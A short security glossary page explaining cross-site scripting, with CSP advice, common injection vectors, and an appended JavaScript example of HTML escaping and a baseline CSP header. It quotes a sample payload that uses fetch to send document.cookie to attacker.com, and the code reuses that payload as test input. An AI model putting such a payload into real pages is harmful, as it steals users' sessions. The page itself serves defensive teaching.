
XSS (Cross-Site Scripting)

XSS is a vulnerability where attackers inject malicious scripts into trusted websites.

Security · 1 min read

In plain English

A bad actor gets their own code to run on a site you trust (e.g. via a comment or a search result), so that code can steal your login or act as you.

Cross-Site Scripting (XSS) occurs when an application includes untrusted data in a web page without proper validation or escaping. The attacker's script then runs in the victim's browser, potentially stealing session cookies, capturing passwords, or defacing the page.

Security headers like Content Security Policy (CSP) are the primary defense against XSS. Our header tool checks if your CSP is correctly configured to block unauthorized scripts.

Examples & Usage

Typical Payload

<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>

Common Vectors

Search bars, comment sections, or URL parameters that reflect input back to the user without filtering.
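As an added example (not code from the Smart Domain Check page), here is the reflected search page described above rendered first without and then with escaping, alongside a baseline CSP header of the kind the header tool checks for; all function names and the CSP values are assumptions, and the input is the payload quoted on this page.

```javascript
// Added example, not part of the original page. Function names
// (htmlEscape, renderUnsafe, renderSafe, cspHeader, containsScriptTag)
// are hypothetical.

// Escape the five characters that let input break out of HTML text or
// attribute context. Everything else is passed through unchanged.
function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: the query is concatenated straight into the markup, so a
// query containing <script> becomes a script the victim's browser runs.
function renderUnsafe(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Hardened: the same page with the query HTML-escaped before interpolation.
// The browser now displays the payload as text instead of executing it.
function renderSafe(query) {
  return `<h1>Results for: ${htmlEscape(query)}</h1>`;
}

// Defense in depth: a CSP allowing scripts only from the site's own origin
// and no inline scripts, so an injected inline <script> is blocked even
// where escaping was missed. Constructed baseline values, not a
// recommendation tuned to any particular site.
function cspHeader() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');
}

// Crude check used below: does the rendered HTML still contain a script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed input: the payload quoted on this page, used as a search query.
const payload = "<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>";
console.log(containsScriptTag(renderUnsafe(payload))); // true
console.log(containsScriptTag(renderSafe(payload)));   // false
console.log('Content-Security-Policy: ' + cspHeader());
```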
